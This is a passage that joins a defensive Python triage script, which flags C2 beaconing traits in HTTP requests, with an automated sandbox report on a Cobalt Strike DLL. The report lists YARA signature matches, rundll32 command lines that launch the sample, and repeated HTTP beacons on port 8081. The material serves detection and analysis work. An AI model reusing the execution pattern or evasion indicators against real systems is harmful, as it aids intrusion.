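def parse_request(raw):
    """Minimal HTTP/1.1 request parser: request line, headers, cookie jar."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    host, _, port = headers.get("host", "").partition(":")
    cookies = {}
    for part in headers.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return {"method": method, "path": path, "version": version, "host": host,
            "port": int(port) if port else 80, "headers": headers, "cookies": cookies}


def shannon_entropy(text):
    """Bits per character; uniformly random base64 text approaches 6.0."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def decode_base64url(value):
    """Decode the base64url alphabet (RFC 4648 section 5) the observed cookies
    use, restoring any stripped padding; None if the value is not base64 at all."""
    try:
        return base64.urlsafe_b64decode(value + "=" * (-len(value) % 4))
    except (binascii.Error, ValueError):
        return None


def triage(raw_requests, standard_ports=(80, 443)):
    """Summarise a burst of requests and flag the beaconing traits seen above."""
    reqs = [parse_request(r) for r in raw_requests]
    endpoints = {(r["host"], r["port"]) for r in reqs}
    paths = {r["path"] for r in reqs}
    cookie_values = [v for r in reqs for v in r["cookies"].values()]
    decoded = [decode_base64url(v) for v in cookie_values]
    decoded_lengths = {len(d) for d in decoded if d is not None}
    entropies = [shannon_entropy(v) for v in cookie_values]
    flags = []
    if any(port not in standard_ports for _, port in endpoints):
        flags.append("http-on-non-standard-port")
    if len(reqs) >= 3 and len(paths) == 1:
        flags.append("repeated-fixed-uri")
    # Every value distinct, every value the same decoded size, every value
    # indistinguishable from random: an encrypted blob wearing a cookie name.
    if (cookie_values and len(set(cookie_values)) == len(cookie_values)
            and len(decoded_lengths) == 1 and min(entropies) > 5.0):
        flags.append("opaque-fixed-length-cookie")
    return {"requests": len(reqs), "endpoints": endpoints, "paths": paths,
            "decoded_cookie_lengths": decoded_lengths,
            "min_cookie_entropy": round(min(entropies), 2) if entropies else None,
            "flags": flags}


if __name__ == "__main__":
    print(triage(SAMPLE_REQUESTS))
```

The three flags together are the useful signal; each alone (a proxy on 8081, a polling endpoint, a long session token) is common in benign traffic, which is why the function reports them separately rather than returning a verdict.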

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000003.00000002.640651466.0000019BD8300000.00000020.00000001.sdmp, type: MEMORY, matched rule: Detects CobaltStrike sleep_mask decoder, author: yara@s3c.za.net
          Source: 00000005.00000002.641411926.00000243BEA20000.00000020.00000001.sdmp, type: MEMORY, matched rule: Detects CobaltStrike sleep_mask decoder, author: yara@s3c.za.net
          Source: 00000004.00000002.641582274.0000012256E00000.00000020.00000001.sdmp, type: MEMORY, matched rule: Detects CobaltStrike sleep_mask decoder, author: yara@s3c.za.net
          Source: 3.2.rundll32.exe.6bc00000.0.unpack, type: UNPACKEDPE, matched rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64 (author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc)
          Source: 5.2.rundll32.exe.6bc00000.0.unpack, type: UNPACKEDPE, matched rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64 (author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc)
          Source: 4.2.rundll32.exe.6bc00000.0.unpack, type: UNPACKEDPE, matched rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64 (author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc)
          Source: 00000005.00000002.636963833.000000006BC03000.00000004.00020000.sdmp, type: MEMORY, matched rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64 (author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc)
          Source: 00000004.00000002.636959360.000000006BC03000.00000004.00020000.sdmp, type: MEMORY, matched rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64 (author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc)
          Source: 00000003.00000002.640651466.0000019BD8300000.00000020.00000001.sdmp, type: MEMORY, matched rule: CobaltStrike_Sleep_Decoder_Indicator (date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder)
          Source: 00000005.00000003.251028132.00000243BE620000.00000040.00000001.sdmp, type: MEMORY, matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator (date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration)
          Source: 00000005.00000003.251028132.00000243BE620000.00000040.00000001.sdmp, type: MEMORY, matched rule: CobaltStrike_MZ_Launcher (date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher)
          Source: 00000005.00000003.251028132.00000243BE620000.00000040.00000001.sdmp, type: MEMORY, matched rule: SUSP_XORed_Mozilla (date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research)
          Source: 00000005.00000002.641133563.00000243BE250000.00000020.00000001.sdmp, type: MEMORY, matched rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64 (author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc)
          Source: 00000004.00000003.244001600.0000012256A00000.00000040.00000001.sdmp, type: MEMORY, matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator (date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration)
          Source: 00000004.00000003.244001600.0000012256A00000.00000040.00000001.sdmp, type: MEMORY, matched rule: CobaltStrike_MZ_Launcher (date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher)
          Source: 00000004.00000003.244001600.0000012256A00000.00000040.00000001.sdmp, type: MEMORY, matched rule: SUSP_XORed_Mozilla (date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research)
          Source: 00000003.00000003.243495836.0000019BD7F00000.00000040.00000001.sdmp, type: MEMORY, matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator (date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration)
          Source: 00000003.00000003.243495836.0000019BD7F00000.00000040.00000001.sdmp, type: MEMORY, matched rule: CobaltStrike_MZ_Launcher (date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher)
          Source: 00000003.00000003.243495836.0000019BD7F00000.00000040.00000001.sdmp, type: MEMORY, matched rule: SUSP_XORed_Mozilla (date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research)
          Source: 00000003.00000002.636991024.000000006BC03000.00000004.00020000.sdmp, type: MEMORY, matched rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64 (author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc)
          Source: 00000003.00000002.640457266.0000019BD7B00000.00000020.00000001.sdmp, type: MEMORY, matched rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64 (author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc)
          Source: 00000005.00000002.641411926.00000243BEA20000.00000020.00000001.sdmp, type: MEMORY, matched rule: CobaltStrike_Sleep_Decoder_Indicator (date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder)
          Source: 00000004.00000002.641196073.0000012256620000.00000020.00000001.sdmp, type: MEMORY, matched rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64 (author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc)
          Source: 00000004.00000002.641582274.0000012256E00000.00000020.00000001.sdmp, type: MEMORY, matched rule: CobaltStrike_Sleep_Decoder_Indicator (date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder)
          Source: Process Memory Space: rundll32.exe PID: 5868, type: MEMORYSTRMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
          Source: Process Memory Space: rundll32.exe PID: 3012, type: MEMORYSTRMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
          Source: Process Memory Space: rundll32.exe PID: 1340, type: MEMORYSTRMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_6BC01400
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD7B00109
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD8314EC0
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD8319CB4
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD831C810
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD83143D0
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD8326C60
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD831BD54
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD831B5E8
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD83275D0
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000012256620109
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000012256E19CB4
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000012256E14EC0
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000012256E143D0
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000012256E26C60
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000012256E1C810
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000012256E275D0
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000012256E1BD54
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000012256E1B5E8
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000243BE250109
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000243BEA34EC0
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000243BEA39CB4
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000243BEA3C810
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000243BEA3B5E8
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000243BEA46C60
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000243BEA475D0
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000243BEA3BD54
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000243BEA343D0
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: Number of sections : 20 > 10
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: Section: .text IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD8314EC0 CreateToolhelp32Snapshot,Process32First,ProcessIdToSessionId,FindCloseChangeNotification,
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll,gSDCSXjfiSV
          Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll'
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',#1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll,gSDCSXjfiSV
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',#1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',gSDCSXjfiSV
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',#1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll,gSDCSXjfiSV
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',gSDCSXjfiSV
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',#1
          Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: rundll32.exeString found in binary or memory: -addr
          Source: rundll32.exeString found in binary or memory: -start
          Source: classification engineClassification label: mal88.troj.evad.winDLL@9/0@0/1
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: Image base 0x6bc00000 > 0x60000000
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F04563 push esi; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F07CF6 push ecx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F05BBF push eax; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F05B91 push eax; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F06B82 push ebx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F06B22 push ebx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F06216 push ecx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F0487C push edx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F04FFC push esi; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F05EEB push edx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F076E7 push esp; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F076C4 push ebx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F04EC5 push esp; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_3_0000019BD7F0665B push ebp; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_6BC119C8 pushfq ; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD7B00128 push eax; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD7B00109 push eax; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD830971E push cs; retf
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD83250DB push ebp; iretd
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD8325124 push ebp; iretd
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD83250FB push ebp; iretd
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD830935D push edi; iretd
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD830AD58 push ebp; iretd
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD83165F0 push cs; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 4_3_0000012256A06B82 push ebx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 4_3_0000012256A05B91 push eax; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 4_3_0000012256A05BBF push eax; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 4_3_0000012256A06B22 push ebx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 4_3_0000012256A06216 push ecx; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 4_3_0000012256A076E7 push esp; ret
          Source: C:\Windows\System32\rundll32.exeCode function: 4_3_0000012256A05EEB push edx; ret
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: section name: .xdata
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: section name: /4
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: section name: /19
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: section name: /31
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: section name: /45
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: section name: /57
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: section name: /70
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: section name: /81
          Source: GnGmRmwtZJjkTEt.dllStatic PE information: section name: /92

          Hooking and other Techniques for Hiding and Protection:

          Uses known network protocols on non-standard ports
          Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49740
          Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49741
          Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49742
          Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49743
          Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49744
          Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49745
          Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49746
          Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49747
          Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49749
          Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49751
          Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49754
          Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49755
          Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49756
          Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49757
          Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49758
          Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49759
          Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49762
          Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49763
          Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49764
          Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49765
          Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49766
          Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49767
          Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49768
          Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49769
          Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49770
          Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49787
          Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49790
          Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49809
          Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49810
          Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49811
          Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49815
          Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49818
          Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49821
          Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49836
          Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49850
          Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49851
          Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49852
          Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49853
          Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49854
          Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49855
          Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49856
          Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49857
          Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49858
          Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49859
          Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49861
          Source: unknown Network traffic detected: HTTP traffic on port 49865 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49865
          Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49866
          Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49867
          Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49868
          Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49869
          Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49870
          Source: unknown Network traffic detected: HTTP traffic on port 49871 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49871
          Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49872
          Source: unknown Network traffic detected: HTTP traffic on port 49873 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49873
          Source: unknown Network traffic detected: HTTP traffic on port 49874 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49874
          Source: unknown Network traffic detected: HTTP traffic on port 49875 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49875
          Source: unknown Network traffic detected: HTTP traffic on port 49876 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49876
          Source: unknown Network traffic detected: HTTP traffic on port 49877 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49877
          Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49878
          Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49879
          Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49880
          Source: unknown Network traffic detected: HTTP traffic on port 49881 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49881
          Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49882
          Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49883
          Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49884
          Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49885
          Source: unknown Network traffic detected: HTTP traffic on port 49886 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49886
          Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49887
          Source: unknown Network traffic detected: HTTP traffic on port 49888 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49888
          Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49889
          Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49890
          Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49891
          Source: unknown Network traffic detected: HTTP traffic on port 49892 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49892
          Source: unknown Network traffic detected: HTTP traffic on port 49893 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49893
          Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49894
          Source: unknown Network traffic detected: HTTP traffic on port 49895 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49895
          Source: unknown Network traffic detected: HTTP traffic on port 49896 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49896
          Source: unknown Network traffic detected: HTTP traffic on port 49897 -> 8081
          Source: unknown Network traffic detected: HTTP traffic on port 8081 -> 49897
          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
